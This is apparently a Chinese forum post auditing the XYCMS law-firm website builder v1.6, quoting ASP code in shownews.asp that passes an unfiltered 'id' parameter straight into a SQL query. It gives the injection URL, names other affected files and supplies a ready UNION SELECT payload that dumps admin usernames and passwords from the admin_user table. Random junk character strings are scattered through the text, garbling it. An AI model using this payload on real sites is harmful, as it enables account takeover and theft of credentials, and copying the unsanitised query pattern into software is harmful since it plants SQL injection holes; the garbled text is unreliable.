前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似( N9 l+ A! o7 v0 U) _
0 ?. b) @ Q6 x1 [- K7 g
淫荡分割线
0 Y# \* x- y/ I5 g @--------------------------------------------------------* j8 n1 z* O5 g6 }" F) A
+ A' `& C6 l& i4 H$ x. U+ B- S
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)5 t" N# W& x4 |( U% J, C7 W
源码地址:http://down.chinaz.com/soft/29233.htm
( K! D c) v4 |8 A' F' g4 [" r& i+ e r 0 M6 h, A; c% ]; N) _* h
漏洞文件:shownews.asp) Z5 |: e% h$ r
漏洞代码:7-13行
1 D, h1 C: R: K" S; z6 @6 h3 P 2 s9 C* I* J, r0 F4 g
$ k: C% w. G( k c: \1 v& _
<% 2 \; f8 o% ]- a' P2 P7 B
id=request.QueryString("id")/ m/ ?1 M( l$ s; X
5 W9 c+ x9 s: F" Uset snews=server.createobject("adodb.recordset") 5 \/ \1 v7 d3 Z0 \: R H; t* g& b
exec="select * from [news] where id="&id
2 C+ n9 J, Z6 ?' Q/ h& M j* D! _snews.open exec,conn,1,1; n- U) b0 M2 X' w$ y0 s
%>
k. u) x; p* L4 p6 b
, Z* S j6 X1 W1 z$ z
( X1 s: E& \/ P! h8 U什么过滤都没有 直造成注入4 ^, l, N7 S+ v. ]% }
( k9 U1 Z+ n) ]" ~ L注入点:http://127.0.0.1:99/shownews.asp?id=xx! K2 k4 O1 x" y7 g) J' G2 r
$ t* l% i3 C$ O. n8 o其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找4 ?: n3 t+ X" J! F1 g5 M/ s
7 R( o8 T# ]. G) ~
) C. m( y/ _3 d0 J4 C- j, s8 ]: k
exp: union select 1,admin,password,4,5,7 from admin_user2 n* W3 Z( L; D; o9 g/ F
( T Y" d6 Q) w: J3 \: v) H4 z
|